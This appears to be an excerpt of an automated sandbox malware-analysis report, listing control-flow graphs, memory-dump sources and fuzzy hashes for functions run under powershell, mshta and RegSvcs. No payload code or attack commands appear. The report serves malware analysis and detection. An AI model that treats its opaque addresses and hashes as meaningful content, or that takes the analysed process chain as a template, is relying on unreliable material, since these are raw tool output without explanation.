                                                                                    control_flow_graph 113 7fe89a78549-7fe89a78589 114 7fe89a785e9-7fe89a785f9 113->114 115 7fe89a7858b-7fe89a785e8 113->115 116 7fe89a78add-7fe89a78b96 114->116 117 7fe89a785ff-7fe89a78609 114->117 115->114 118 7fe89a7860b-7fe89a78618 117->118 119 7fe89a78622-7fe89a78629 117->119 118->119 123 7fe89a7861a-7fe89a78620 118->123 120 7fe89a7862b-7fe89a7863e 119->120 121 7fe89a78640 119->121 124 7fe89a78642-7fe89a78644 120->124 121->124 123->119 126 7fe89a78a58-7fe89a78a62 124->126 127 7fe89a7864a-7fe89a78656 124->127 129 7fe89a78a64-7fe89a78a74 126->129 130 7fe89a78a75-7fe89a78a85 126->130 127->116 131 7fe89a7865c-7fe89a78666 127->131 133 7fe89a78a87-7fe89a78a8b 130->133 134 7fe89a78a92-7fe89a78adc 130->134 135 7fe89a78668-7fe89a78675 131->135 136 7fe89a78682-7fe89a78692 131->136 133->134 135->136 137 7fe89a78677-7fe89a78680 135->137 136->126 142 7fe89a78698-7fe89a786cc 136->142 137->136 142->126 147 7fe89a786d2-7fe89a786de 142->147 147->116 148 7fe89a786e4-7fe89a786ee 147->148 149 7fe89a78707-7fe89a7870c 148->149 150 7fe89a786f0-7fe89a786fd 148->150 149->126 152 7fe89a78712-7fe89a78717 149->152 150->149 151 7fe89a786ff-7fe89a78705 150->151 151->149 152->126 153 7fe89a7871d-7fe89a78722 152->153 153->126 155 7fe89a78728-7fe89a78737 153->155 156 7fe89a78747 155->156 157 7fe89a78739-7fe89a78743 155->157 160 7fe89a7874c-7fe89a78759 156->160 158 7fe89a78763-7fe89a787ee 157->158 159 7fe89a78745 157->159 167 7fe89a787f0-7fe89a787fb 158->167 168 7fe89a78802-7fe89a78824 158->168 159->160 160->158 161 7fe89a7875b-7fe89a78761 160->161 161->158 167->168 169 7fe89a78826-7fe89a78830 168->169 170 7fe89a78834 168->170 171 7fe89a78850-7fe89a788de 169->171 172 7fe89a78832 169->172 173 7fe89a78839-7fe89a78846 170->173 180 7fe89a788e0-7fe89a788eb 171->180 181 7fe89a788f2-7fe89a78910 171->181 172->173 173->171 174 7fe89a78848-7fe89a7884e 173->174 174->171 180->181 182 7fe89a78920 181->182 183 7fe89a78912-7fe89a7891c 181->183 186 7fe89a78925-7fe89a78933 182->186 184 7fe89a7893d-7fe89a789cd 183->184 185 7fe89a7891e 183->185 193 7fe89a789cf-7fe89a789da 184->193 194 7fe89a789e1-7fe89a78a3a 184->194 185->186 186->184 188 7fe89a78935-7fe89a7893b 186->188 188->184 193->194 197 7fe89a78a42-7fe89a78a57 194->197
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.451584130.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_7fe89a70000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d1da66156b7ad1539b789ab88bec6ad979e51311f43443fdef523ca1ef250d2e
                                                                                    • Instruction ID: cfa4933420286063e32d01190f5090ac72ab51b493826e1bd4a3ef4255db9e4f
                                                                                    • Opcode Fuzzy Hash: d1da66156b7ad1539b789ab88bec6ad979e51311f43443fdef523ca1ef250d2e
                                                                                    • Instruction Fuzzy Hash: C622F33090CB894FD78ADB2C84916697BE2FF9A344F2401EED08ED72A3DA24AC55C741
                                                                                    Function 000007FE89A710D3 Relevance: .2, Instructions: 150COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 198 7fe89a710d3-7fe89a710dc 199 7fe89a710ed-7fe89a71124 198->199 200 7fe89a710de-7fe89a710e9 198->200 203 7fe89a7112a-7fe89a71148 199->203 204 7fe89a711c1-7fe89a711cb 199->204 201 7fe89a71149-7fe89a7119e 200->201 202 7fe89a710eb 200->202 214 7fe89a711a6-7fe89a711be 201->214 202->199 203->201 205 7fe89a711d8-7fe89a711e8 204->205 206 7fe89a711cd-7fe89a711d7 204->206 207 7fe89a711ea-7fe89a711ee 205->207 208 7fe89a711f5-7fe89a7121a 205->208 207->208 214->204
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.451584130.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_7fe89a70000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: acdad9d8afe866ba12097a09ce7281f4f5c096bcaf134fae1725ebd59e0e42b7
                                                                                    • Instruction ID: 8dcd60d43a69745e3c7ace8338a29dbaa9322c08613a7a9f452ca168d13afed5
                                                                                    • Opcode Fuzzy Hash: acdad9d8afe866ba12097a09ce7281f4f5c096bcaf134fae1725ebd59e0e42b7
                                                                                    • Instruction Fuzzy Hash: B641C301B0DBC90FE34B937C1854264BFE1EF4B655B2911EBC48ECB1A3E9099C6AC361

                                                                                    Non-executed Functions

                                                                                    Function 000007FE89A7352E Relevance: .3, Instructions: 340COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.451584130.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_7fe89a70000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f0fb7e4a2025e30c280a5d5d6bec7b8dbe7784c7da25fa2c13f8466cb1d05589
                                                                                    • Instruction ID: a1a5740ec8d4a0c7ee118e22a0c9e964080e96a9c198d6bc272b1c4201c7d37e
                                                                                    • Opcode Fuzzy Hash: f0fb7e4a2025e30c280a5d5d6bec7b8dbe7784c7da25fa2c13f8466cb1d05589
                                                                                    • Instruction Fuzzy Hash: 62B1472080EBC91FD747A77868102A63FF1EF47254F1A01EBD48DCB1A3D6189D1AC362

                                                                                    Executed Functions

                                                                                    Function 02D70FC1 Relevance: .0, Instructions: 5COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000003.467306964.0000000002D70000.00000010.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_3_2d70000_mshta.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                    • Instruction ID: d27ca64c316315b01ba0a1c2e87c6a7cccc230a9244e6265d098e816b3b60b12
                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                    • Instruction Fuzzy Hash:
                                                                                    Function 02D70FB1 Relevance: .0, Instructions: 5COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000003.467306964.0000000002D70000.00000010.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_3_2d70000_mshta.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                    • Instruction ID: d27ca64c316315b01ba0a1c2e87c6a7cccc230a9244e6265d098e816b3b60b12
                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                    • Instruction Fuzzy Hash:
                                                                                    Function 02D70FB9 Relevance: .0, Instructions: 5COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000003.467306964.0000000002D70000.00000010.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_3_2d70000_mshta.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                    • Instruction ID: d27ca64c316315b01ba0a1c2e87c6a7cccc230a9244e6265d098e816b3b60b12
                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                    • Instruction Fuzzy Hash:

                                                                                    Execution Graph

                                                                                    Execution Coverage:14.7%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:31.8%
                                                                                    Total number of Nodes:22
                                                                                    Total number of Limit Nodes:0
                                                                                    execution_graph 11481 3c4720 11482 3c472c 11481->11482 11485 3c78c0 11482->11485 11483 3c47e0 11487 3c78f2 11485->11487 11486 3c7cd9 11486->11483 11487->11486 11492 3cfcb8 11487->11492 11496 3cfe53 11487->11496 11500 3cfec5 11487->11500 11504 3cfca8 11487->11504 11493 3cfcdf 11492->11493 11494 3cfe0a LdrInitializeThunk 11493->11494 11495 3cfdfb 11493->11495 11494->11495 11495->11487 11499 3cfd17 11496->11499 11497 3cfe0a LdrInitializeThunk 11498 3cfdfb 11497->11498 11498->11487 11499->11497 11499->11498 11502 3cfd17 11500->11502 11503 3cfdfb 11500->11503 11501 3cfe0a LdrInitializeThunk 11501->11503 11502->11501 11502->11503 11503->11487 11505 3cfcdf 11504->11505 11506 3cfe0a LdrInitializeThunk 11505->11506 11507 3cfdfb 11505->11507 11506->11507 11507->11487

                                                                                    Executed Functions

                                                                                    Function 003C5038 Relevance: 1.8, Strings: 1, Instructions: 596COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 971 3c5038-3c5058 972 3c505f-3c524b call 3c0374 * 4 971->972 973 3c505a 971->973 994 3c5aad-3c5ac3 972->994 973->972 995 3c5ac9-3c5b07 994->995 996 3c5250-3c5259 994->996 997 3c525b 996->997 998 3c5260-3c527e 996->998 997->998 1000 3c5284-3c52a6 call 3c2f4c 998->1000 1001 3c5aa0-3c5aa6 998->1001 1007 3c5a83-3c5a99 1000->1007 1001->994 1003 3c5aa8 1001->1003 1003->994 1008 3c5a9f 1007->1008 1009 3c52ab-3c52b4 1007->1009 1008->1001 1010 3c52bb-3c53da call 3c0374 call 3c0394 * 5 1009->1010 1011 3c52b6 1009->1011 1025 3c53df-3c540c 1010->1025 1011->1010 1026 3c5a46-3c5a65 1025->1026 1027 3c5412-3c541e 1025->1027 1030 3c5a74 1026->1030 1031 3c5a67-3c5a73 1026->1031 1029 3c54be-3c54d4 1027->1029 1032 3c54da-3c55a0 call 3c0394 1029->1032 1033 3c5423-3c542c 1029->1033 1030->1007 1031->1030 1053 3c55a7-3c5602 1032->1053 1054 3c55a2 1032->1054 1035 3c542e 1033->1035 1036 3c5433-3c5464 call 3c0394 1033->1036 1035->1036 1042 3c54a8-3c54b4 1036->1042 1043 3c5466-3c54a7 call 3c0394 1036->1043 1045 3c54bb 1042->1045 1046 3c54b6 1042->1046 1043->1042 1045->1029 1046->1045 1056 3c5609-3c560d 1053->1056 1057 3c5604 1053->1057 1054->1053 1058 3c561d-3c5627 1056->1058 1059 3c560f-3c561b 1056->1059 1057->1056 1061 3c562e-3c564e 1058->1061 1062 3c5629 1058->1062 1060 3c5654-3c56e8 call 3c0394 1059->1060 1069 3c56ee-3c577e 1060->1069 1070 3c5886-3c58ad 1060->1070 1061->1060 1062->1061 1078 3c5785-3c57e0 1069->1078 1079 3c5780 1069->1079 1073 3c58ae-3c5a45 1070->1073 1073->1026 1082 3c57e7-3c57eb 1078->1082 1083 3c57e2 1078->1083 1079->1078 1084 3c57ed-3c57f9 1082->1084 1085 3c57fb-3c5805 1082->1085 1083->1082 1087 3c5832-3c5884 1084->1087 1088 3c580c-3c582c 1085->1088 1089 3c5807 1085->1089 1087->1073 1088->1087 1089->1088
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.628958946.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: &55p
                                                                                    • API String ID: 0-1955183375
                                                                                    • Opcode ID: cb4d0922580c999c5e86ed0434d9d169dbbf8a1575435622fd5283abe86c3e64
                                                                                    • Instruction ID: a8be3fc14019eac0c926a1c17de1657235b22a7e1edf9fb3050da3e0239d5281
                                                                                    • Opcode Fuzzy Hash: cb4d0922580c999c5e86ed0434d9d169dbbf8a1575435622fd5283abe86c3e64
                                                                                    • Instruction Fuzzy Hash: 6952CE74A01228CFDB65DF69C884B9DBBB2BF89300F5085EAD409A7255DB31AE85CF50
                                                                                    Function 003CFCB8 Relevance: 1.6, APIs: 1, Instructions: 124libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1146 3cfcb8-3cfcdd 1147 3cfcdf 1146->1147 1148 3cfce4-3cfd4b 1146->1148 1147->1148 1153 3cfdd5-3cfddb 1148->1153 1154 3cfd50-3cfd63 1153->1154 1155 3cfde1-3cfdf9 1153->1155 1156 3cfd6a-3cfda6 1154->1156 1157 3cfd65 1154->1157 1158 3cfe0a-3cfe2a LdrInitializeThunk 1155->1158 1159 3cfdfb-3cfe08 1155->1159 1168 3cfda8-3cfdb6 1156->1168 1169 3cfdb9-3cfdcb 1156->1169 1157->1156 1160 3cfe2c-3cff07 1158->1160 1159->1160 1163 3cff0f-3cff18 1160->1163 1164 3cff09-3cff0e 1160->1164 1164->1163 1168->1155 1172 3cfdcd 1169->1172 1173 3cfdd2 1169->1173 1172->1173 1173->1153
                                                                                    APIs
                                                                                    • LdrInitializeThunk.NTDLL(000000FF), ref: 003CFE1A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.628958946.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: ac217c9921425164bfad3e600270c038cb5cfb33a58ae2957e525d7d39f439aa
                                                                                    • Instruction ID: aed202b630b5bc88703eaf19d610b4a36d13b178ef68b02a5e3f10d15b324490
                                                                                    • Opcode Fuzzy Hash: ac217c9921425164bfad3e600270c038cb5cfb33a58ae2957e525d7d39f439aa
                                                                                    • Instruction Fuzzy Hash: 7A5113B4D00218CFDB19CFAAD888BDDBBB6BF88314F20C52AE415AB294D7749945CF54
                                                                                    Function 004C5E58 Relevance: .7, Instructions: 745COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1226 4c5e58-4c5e78 1227 4c5e7f-4c5ef7 1226->1227 1228 4c5e7a 1226->1228 1232 4c5ef9-4c5f3f 1227->1232 1233 4c5f44-4c5f96 1227->1233 1228->1227 1240 4c5fdd-4c60c1 1232->1240 1233->1240 1241 4c5f98-4c5fdc 1233->1241 1253 4c6c76-4c6cab 1240->1253 1254 4c60c7-4c61c9 1240->1254 1241->1240 1264 4c6c69-4c6c6f 1254->1264 1265 4c61ce-4c62ab 1264->1265 1266 4c6c75 1264->1266 1274 4c62ad 1265->1274 1275 4c62b2-4c631a 1265->1275 1266->1253 1274->1275 1279 4c631c 1275->1279 1280 4c6321-4c6332 1275->1280 1279->1280 1281 4c63be-4c64c4 1280->1281 1282 4c6338-4c6342 1280->1282 1300 4c64cb-4c6533 1281->1300 1301 4c64c6 1281->1301 1283 4c6349-4c63bd 1282->1283 1284 4c6344 1282->1284 1283->1281 1284->1283 1305 4c653a-4c654b 1300->1305 1306 4c6535 1300->1306 1301->1300 1307 4c65d7-4c678a 1305->1307 1308 4c6551-4c655b 1305->1308 1306->1305 1329 4c678c 1307->1329 1330 4c6791-4c680e 1307->1330 1309 4c655d 1308->1309 1310 4c6562-4c65d6 1308->1310 1309->1310 1310->1307 1329->1330 1334 4c6815-4c6826 1330->1334 1335 4c6810 1330->1335 1336 4c682c-4c6836 1334->1336 1337 4c68b2-4c694b 1334->1337 1335->1334 1338 4c683d-4c68b1 1336->1338 1339 4c6838 1336->1339 1348 4c694d 1337->1348 1349 4c6952-4c69c9 1337->1349 1338->1337 1339->1338 1348->1349 1355 4c69cb 1349->1355 1356 4c69d0-4c69e1 1349->1356 1355->1356 1357 4c6ace-4c6b62 1356->1357 1358 4c69e7-4c6a7b 1356->1358 1367 4c6b68-4c6c53 1357->1367 1368 4c6c54-4c6c5f 1357->1368 1372 4c6a7d 1358->1372 1373 4c6a82-4c6acd 1358->1373 1367->1368 1370 4c6c66 1368->1370 1371 4c6c61 1368->1371 1370->1264 1371->1370 1372->1373 1373->1357
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ce40d3d0c90b02622b49a48f19ab382f6f9166b949dc4e4e48ac4640dd484e50
                                                                                    • Instruction ID: 85f385e6cd0e5232c3ce2bfe1b6d7e147a6e19c4e306b9ff8d2c43968fef843f
                                                                                    • Opcode Fuzzy Hash: ce40d3d0c90b02622b49a48f19ab382f6f9166b949dc4e4e48ac4640dd484e50
                                                                                    • Instruction Fuzzy Hash: 09827074E012288FDB64DF69C894BDDBBB2AF89300F1081EAD50DA7265DB759E85CF40
                                                                                    Function 003C5B18 Relevance: .7, Instructions: 716COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1388 3c5b18-3c5b48 1390 3c5b4f-3c5bd1 1388->1390 1391 3c5b4a 1388->1391 1393 3c5c38-3c5c4e 1390->1393 1391->1390 1394 3c5c50-3c5c9a call 3c0374 1393->1394 1395 3c5bd3-3c5bdc 1393->1395 1404 3c5c9c-3c5cdd call 3c0394 1394->1404 1405 3c5d05-3c5d06 1394->1405 1396 3c5bde 1395->1396 1397 3c5be3-3c5c2e call 3c2874 1395->1397 1396->1397 1406 3c5c35 1397->1406 1407 3c5c30 1397->1407 1413 3c5cff-3c5d00 1404->1413 1414 3c5cdf-3c5cfd 1404->1414 1409 3c5d07-3c5d38 1405->1409 1406->1393 1407->1406 1415 3c5d3f-3c5da6 1409->1415 1416 3c5d01-3c5d03 1413->1416 1414->1416 1421 3c5dac-3c5dcd 1415->1421 1422 3c66f8-3c672f 1415->1422 1416->1409 1425 3c66d5-3c66f1 1421->1425 1426 3c66f7 1425->1426 1427 3c5dd2-3c5ddb 1425->1427 1426->1422 1428 3c5ddd 1427->1428 1429 3c5de2-3c5e48 call 3c2f74 1427->1429 1428->1429 1434 3c5e4f-3c5ed9 call 3c2f84 1429->1434 1435 3c5e4a 1429->1435 1442 3c5eeb-3c5ef2 1434->1442 1443 3c5edb-3c5ee2 1434->1443 1435->1434 1446 3c5ef9-3c5f06 1442->1446 1447 3c5ef4 1442->1447 1444 3c5ee9 1443->1444 1445 3c5ee4 1443->1445 1444->1446 1445->1444 1448 3c5f0d-3c5f14 1446->1448 1449 3c5f08 1446->1449 1447->1446 1450 3c5f1b-3c5f72 1448->1450 1451 3c5f16 1448->1451 1449->1448 1454 3c5f79-3c5f90 1450->1454 1455 3c5f74 1450->1455 1451->1450 1456 3c5f9b-3c5fa3 1454->1456 1457 3c5f92-3c5f99 1454->1457 1455->1454 1458 3c5fa4-3c5fae 1456->1458 1457->1458 1459 3c5fb5-3c5fbe 1458->1459 1460 3c5fb0 1458->1460 1461 3c66a5-3c66ab 1459->1461 1460->1459 1462 3c66b1-3c66cb 1461->1462 1463 3c5fc3-3c5fcf 1461->1463 1471 3c66cd 1462->1471 1472 3c66d2 1462->1472 1464 3c5fd6-3c5fdb 1463->1464 1465 3c5fd1 1463->1465 1467 3c5fdd-3c5fe9 1464->1467 1468 3c601e-3c6020 1464->1468 1465->1464 1469 3c5feb 1467->1469 1470 3c5ff0-3c5ff5 1467->1470 1473 3c6026-3c603a 1468->1473 1469->1470 1470->1468 1474 3c5ff7-3c6004 1470->1474 1471->1472 1472->1425 1475 3c6040-3c6055 1473->1475 1476 3c6683-3c6690 1473->1476 1477 3c600b-3c601c 1474->1477 1478 3c6006 1474->1478 1479 3c605c-3c60e2 1475->1479 1480 3c6057 1475->1480 1481 3c6691-3c669b 1476->1481 1477->1473 1478->1477 1488 3c610c 1479->1488 1489 3c60e4-3c610a 1479->1489 1480->1479 1482 3c669d 1481->1482 1483 3c66a2 1481->1483 1482->1483 1483->1461 1490 3c6116-3c6136 1488->1490 1489->1490 1492 3c613c-3c6146 1490->1492 1493 3c62b5-3c62ba 1490->1493 1494 3c614d-3c6176 1492->1494 1495 3c6148 1492->1495 1496 3c62bc-3c62dc 1493->1496 1497 3c631e-3c6320 1493->1497 1499 3c6178-3c6182 1494->1499 1500 3c6190-3c6192 1494->1500 1495->1494 1512 3c62de-3c6304 1496->1512 1513 3c6306 1496->1513 1498 3c6326-3c6346 1497->1498 1502 3c634c-3c6356 1498->1502 1503 3c667d-3c667e 1498->1503 1505 3c6189-3c618f 1499->1505 1506 3c6184 1499->1506 1501 3c6231-3c6240 1500->1501 1507 3c6247-3c624c 1501->1507 1508 3c6242 1501->1508 1509 3c635d-3c6386 1502->1509 1510 3c6358 1502->1510 1511 3c667f-3c6681 1503->1511 1505->1500 1506->1505 1515 3c624e-3c625e 1507->1515 1516 3c6276-3c6278 1507->1516 1508->1507 1517 3c6388-3c6392 1509->1517 1518 3c63a0-3c63ae 1509->1518 1510->1509 1511->1481 1514 3c6310-3c631c 1512->1514 1513->1514 1514->1498 1520 3c6265-3c6274 1515->1520 1521 3c6260 1515->1521 1522 3c627e-3c6292 1516->1522 1523 3c6399-3c639f 1517->1523 1524 3c6394 1517->1524 1525 3c644d-3c645c 1518->1525 1520->1522 1521->1520 1526 3c6298-3c62b0 1522->1526 1527 3c6197-3c61b2 1522->1527 1523->1518 1524->1523 1528 3c645e 1525->1528 1529 3c6463-3c6468 1525->1529 1526->1511 1532 3c61b9-3c6223 1527->1532 1533 3c61b4 1527->1533 1528->1529 1530 3c646a-3c647a 1529->1530 1531 3c6492-3c6494 1529->1531 1534 3c647c 1530->1534 1535 3c6481-3c6490 1530->1535 1536 3c649a-3c64ae 1531->1536 1550 3c622a-3c6230 1532->1550 1551 3c6225 1532->1551 1533->1532 1534->1535 1535->1536 1537 3c64b4-3c651d 1536->1537 1538 3c63b3-3c63ce 1536->1538 1548 3c651f-3c6521 1537->1548 1549 3c6526-3c6679 1537->1549 1540 3c63d5-3c643f 1538->1540 1541 3c63d0 1538->1541 1555 3c6446-3c644c 1540->1555 1556 3c6441 1540->1556 1541->1540 1552 3c667a-3c667b 1548->1552 1549->1552 1550->1501 1551->1550 1552->1462 1555->1525 1556->1555
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.628958946.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6af05d0f12f2113f5db0fbaba8d5eeaa060caddcf119a7a9fd24b3b54a83649a
                                                                                    • Instruction ID: 3d5f1e2799647c036507626ee02f676f72fec9ecee2be711e35538a886acf2ef
                                                                                    • Opcode Fuzzy Hash: 6af05d0f12f2113f5db0fbaba8d5eeaa060caddcf119a7a9fd24b3b54a83649a
                                                                                    • Instruction Fuzzy Hash: 9572D174E00228CFDB65DF69C885BDDBBB2BB89300F1485EAD409A7255DB34AE85CF50
                                                                                    Function 003C78C0 Relevance: .3, Instructions: 274COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2192 3c78c0-3c78f0 2193 3c78f7-3c7988 2192->2193 2194 3c78f2 2192->2194 2198 3c798e-3c799e 2193->2198 2199 3c7cda-3c7d0c 2193->2199 2194->2193 2252 3c79a1 call 3c7d30 2198->2252 2253 3c79a1 call 3c8072 2198->2253 2202 3c79a7-3c79b6 2254 3c79b8 call 3cc750 2202->2254 2255 3c79b8 call 3cc742 2202->2255 2256 3c79b8 call 3ccb33 2202->2256 2203 3c79be-3c79da 2205 3c79dc 2203->2205 2206 3c79e1-3c79ea 2203->2206 2205->2206 2207 3c7ccd-3c7cd3 2206->2207 2208 3c79ef-3c79fb 2207->2208 2209 3c7cd9 2207->2209 2248 3c79fd call 3cfcb8 2208->2248 2249 3c79fd call 3cfca8 2208->2249 2250 3c79fd call 3cfec5 2208->2250 2251 3c79fd call 3cfe53 2208->2251 2209->2199 2210 3c7a03-3c7a69 2214 3c7a6f-3c7add call 3c2f94 2210->2214 2215 3c7b25-3c7b80 2210->2215 2225 3c7adf-3c7b1f 2214->2225 2226 3c7b20-3c7b23 2214->2226 2227 3c7b81-3c7bcf 2215->2227 2225->2226 2226->2227 2232 3c7cb8-3c7cc3 2227->2232 2233 3c7bd5-3c7cb7 2227->2233 2234 3c7cca 2232->2234 2235 3c7cc5 2232->2235 2233->2232 2234->2207 2235->2234 2248->2210 2249->2210 2250->2210 2251->2210 2252->2202 2253->2202 2254->2203 2255->2203 2256->2203
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.628958946.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cf830789d30d18c99d31607ddb8f8afcd24c00202bf7e818eb23f9870062ee99
                                                                                    • Instruction ID: 3da4edd0d0be03c263a115668117fb4dac90b6f48af7279e1eb7a0b9b493ad50
                                                                                    • Opcode Fuzzy Hash: cf830789d30d18c99d31607ddb8f8afcd24c00202bf7e818eb23f9870062ee99
                                                                                    • Instruction Fuzzy Hash: E1D1C474E04218CFDB14DFA5C994B9DBBB2BF88301F2081AAD809A73A5DB355E85CF50
                                                                                    Function 003C6741 Relevance: .3, Instructions: 274COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2136 3c6741-3c6770 2137 3c6777-3c6808 2136->2137 2138 3c6772 2136->2138 2142 3c680e-3c685a 2137->2142 2143 3c6b5a-3c6b8c 2137->2143 2138->2137 2149 3c685c 2142->2149 2150 3c6861-3c686a 2142->2150 2149->2150 2151 3c6b4d-3c6b53 2150->2151 2152 3c686f-3c68e9 2151->2152 2153 3c6b59 2151->2153 2158 3c68ef-3c695d call 3c2f94 2152->2158 2159 3c69a5-3c6a00 2152->2159 2153->2143 2169 3c695f-3c699f 2158->2169 2170 3c69a0-3c69a3 2158->2170 2171 3c6a01-3c6a4f 2159->2171 2169->2170 2170->2171 2176 3c6b38-3c6b43 2171->2176 2177 3c6a55-3c6b37 2171->2177 2179 3c6b4a 2176->2179 2180 3c6b45 2176->2180 2177->2176 2179->2151 2180->2179
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.628958946.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b48e3802ff14c04c04fccbd52d7817aabe93a62e7257d3a44ad54292444bfe96
                                                                                    • Instruction ID: 66add867ec063cc849fed44e8e1bf3bfb6f4629a8010987bf4560eb41311c20b
                                                                                    • Opcode Fuzzy Hash: b48e3802ff14c04c04fccbd52d7817aabe93a62e7257d3a44ad54292444bfe96
                                                                                    • Instruction Fuzzy Hash: 15D1B374E01218CFDB14DFA5C994B9DBBB2BF89305F2080AAD809A73A5DB355E85CF50
                                                                                    Function 004C25E0 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
